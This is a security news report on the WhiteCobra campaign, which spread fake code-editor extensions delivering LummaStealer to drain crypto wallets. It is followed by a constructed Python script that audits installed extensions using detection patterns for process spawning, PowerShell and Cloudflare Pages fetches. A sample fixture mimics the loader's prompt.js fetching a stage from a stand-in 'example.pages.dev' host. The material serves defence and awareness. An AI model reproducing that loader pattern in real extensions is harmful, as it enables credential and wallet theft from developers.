The hacker collective WhiteCobra has launched a large-scale campaign targeting users of popular code editors including VS Code, Cursor, and Windsurf. Researchers at Koi Security uncovered 24 malicious extensions hosted on official repositories such as Visual Studio Marketplace and Open VSX. Although some were promptly removed, the attackers continue to upload new versions, keeping the operation alive and active.
One high-profile victim was Ethereum developer Zach Cole, whose cryptocurrency wallet was drained after installing the extension contractshark.solidity-lang for Cursor. The add-on appeared entirely legitimate, featuring a professional icon, a detailed description, and tens of thousands of downloads.
This convincing disguise allowed WhiteCobra to lure in a wide audience of unsuspecting developers. The same group had previously been linked to a July incident involving the theft of nearly half a million dollars in cryptocurrency through a fake Cursor extension.
The attack exploits a fundamental weakness in the ecosystem: the unified VSIX package format is used across multiple editors, while security checks for uploaded add-ons remain minimal. This enables threat actors to rapidly adapt and scale their campaigns.
According to Koi Security, each malicious extension mimics legitimate projects by copying their names and descriptions. Among the fraudulent packages identified were ChainDevTools.solidity-pro, kilocode-ai.kilo-code, nomic-fdn.hardhat-solidity, juan-blanco.solidity, Ethereum.solidity-ethereum, and many others, discovered on both Open VSX and the VS Code Marketplace.
From a technical standpoint, the malicious add-ons are deceptively simple. The core file, extension.js, largely mirrors the “Hello World” template but hides a call to another script, prompt.js. This script downloads the payload from Cloudflare Pages. On Windows systems, it delivers a PowerShell script that executes Python code, injects shellcode, and ultimately activates LummaStealer, a well-known infostealer designed to exfiltrate cryptocurrency wallets, browser extensions, saved credentials, and messenger conversations. On macOS, a Mach-O binary compiled for both ARM and Intel architectures loads a separate, as-yet-unclassified malware sample.
Investigators also obtained an internal WhiteCobra playbook, which outlines the group’s financial objectives, strategies for promoting fake extensions, and instructions for setting up command infrastructure. The documents suggest the group is highly organized, capable of launching new attack waves within just three hours of a takedown. Financial targets listed ranged from $10,000 to half a million per campaign cycle.
Experts warn that traditional trust indicators such as download counts, positive reviews, and star ratings can no longer be considered reliable markers of safety. These metrics are easily manipulated, while fake projects often impersonate established developers or organizations. Users are urged to scrutinize extensions carefully before installation, watch for suspicious naming overlaps, and remain cautious of projects that suddenly accumulate tens of thousands of downloads.
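As an added, constructed example (not Koi Security's tooling and not code from the campaign), the following Python audit script flags installed extensions that show the loader traits described above (a sibling script pulling in child_process, invoking PowerShell, or fetching from Cloudflare Pages) and reports extension names claimed by more than one publisher, the local form of the naming overlaps the advice warns about. The extension roots under ~/.vscode, ~/.cursor and ~/.windsurf, the *.pages.dev domain check, and the embedded sample sources are assumptions.

```python
import json
import re
from pathlib import Path

# Traits of the two-stage loader described above: a helper script that spawns a shell
# (PowerShell on Windows) or fetches a payload from Cloudflare Pages (*.pages.dev).
RISKY_PATTERNS = {
    "spawns-process": re.compile(r"require\(['\"]child_process['\"]\)"),
    "powershell": re.compile(r"powershell(?:\.exe)?", re.IGNORECASE),
    "cloudflare-pages": re.compile(r"https?://[\w.-]+\.pages\.dev", re.IGNORECASE),
    "remote-fetch": re.compile(r"\bhttps?\.get\(|\bfetch\(\s*['\"]https?://"),
}

def audit_sources(sources):
    """sources: {relative JS path: text} -> sorted 'path: trait' triage findings."""
    return sorted(f"{path}: {trait}" for path, text in sources.items()
                  for trait, pat in RISKY_PATTERNS.items() if pat.search(text))

def find_name_collisions(ext_ids):
    """Bare extension names claimed by more than one publisher -> publishers;
    a local check for the 'naming overlaps' the advice above warns about."""
    by_name = {}
    for ext_id in ext_ids:
        publisher, _, name = ext_id.partition(".")
        by_name.setdefault(name, set()).add(publisher)
    return {n: sorted(p) for n, p in by_name.items() if len(p) > 1}

def scan_editors(home=Path.home()):
    """Walk the assumed extension roots of VS Code, Cursor and Windsurf."""
    report, ids = {}, []
    for root in (".vscode", ".cursor", ".windsurf"):
        for ext_dir in (home / root / "extensions").glob("*"):
            manifest = ext_dir / "package.json"
            if not manifest.is_file():
                continue
            meta = json.loads(manifest.read_text(encoding="utf-8", errors="replace"))
            ext_id = f"{meta.get('publisher', '?')}.{meta.get('name', ext_dir.name)}"
            ids.append(ext_id)
            sources = {str(p.relative_to(ext_dir)): p.read_text(encoding="utf-8", errors="replace")
                       for p in ext_dir.rglob("*.js") if "node_modules" not in p.parts}
            if findings := audit_sources(sources):
                report[ext_id] = findings
    return report, find_name_collisions(ids)

SAMPLE_SOURCES = {  # constructed stand-in for the two-file layout above, not campaign code
    "extension.js": "const vscode = require('vscode');\nfunction activate() { require('./prompt'); }",
    "prompt.js": "const https = require('https');\nconst { spawn } = require('child_process');\n"
                 "https.get('https://example.pages.dev/stage', r => {});",
}
```

Matches are triage leads rather than proof of malice (many legitimate extensions spawn processes), so review flagged extensions by hand.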
WhiteCobra’s operation starkly illustrates the vulnerabilities of the VS Code ecosystem and its compatible editors, where weak moderation enables malicious actors to pass off dangerous extensions as legitimate tools. For developers, this underscores the need for heightened vigilance, as even familiar work environments may conceal avenues for cryptocurrency theft and credential compromise.